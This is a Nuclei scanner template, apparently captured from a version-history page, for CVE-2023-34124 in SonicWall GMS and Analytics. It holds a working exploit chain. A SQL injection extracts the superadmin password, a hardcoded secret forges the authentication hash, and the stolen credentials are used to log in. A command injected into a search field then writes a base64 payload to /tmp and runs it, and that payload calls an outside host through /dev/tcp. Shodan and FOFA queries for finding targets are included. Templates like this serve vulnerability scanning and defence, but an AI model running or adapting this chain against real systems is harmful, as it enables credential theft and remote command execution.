2023-08-28 13:26:29 +00:00
id : CVE-2023-34124
info :
name : Sonicwall Shell Injection
author : iamnoooob,rootxharsh,pdresearch
severity : critical
description : |
The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass.This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics : 2.5 .0 .4 -R7 and earlier versions.
reference :
- https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
- https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis
- https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cwe-id : CWE-287,CWE-305
metadata :
max-request : 4
shodan-query : http.html:"/sgms/css/martini.css"
fofa-query : body="/sgms/css/martini.css"
verified : true
tags : cve,cve2023,sonicwall,gsm,instrusive
variables :
2023-08-28 13:32:13 +00:00
callback : "echo 1 > /dev/tcp/{{interactsh-url}}/80"
2023-08-28 15:50:44 +00:00
query : "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
secret : '?~!@#$%^^()'
auth : "{{hmac('sha1', query, secret)}}"
2023-08-28 13:26:29 +00:00
http :
- raw :
- |
GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
Host : {{Hostname}}
2023-08-28 15:50:44 +00:00
Auth : {"user": "system", "hash": "{{base64(hex_decode(auth))}}" }
2023-08-28 13:26:29 +00:00
Accept-Encoding : gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept : */*
- |
GET /appliance/login HTTP/1.1
Host : {{Hostname}}
2023-08-28 13:32:13 +00:00
2023-08-28 13:26:29 +00:00
- |
POST /appliance/applianceMainPage HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0
- |
POST /appliance/applianceMainPage HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-08-28 15:50:44 +00:00
num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.yiegatfl\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.yiegatfl%3brm+/tmp/.yiegatfl%3becho+
2023-08-28 13:26:29 +00:00
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body_3
words :
- "<title>SonicWall Universal Management Appliance</title>"
- "<title>SonicWall Universal Management Host</title>"
condition : or
- type : word
part : interactsh_protocol
words :
- "dns"
extractors :
2023-08-28 15:50:44 +00:00
- type : json
part : body
internal : true
name : alias
json :
- '.alias'
2023-08-28 13:26:29 +00:00
2023-08-28 15:50:44 +00:00
- type : regex
part : body
group : 1
internal : true
name : servertoken
regex :
- "getPwdHash.*,'([0-9]+)'"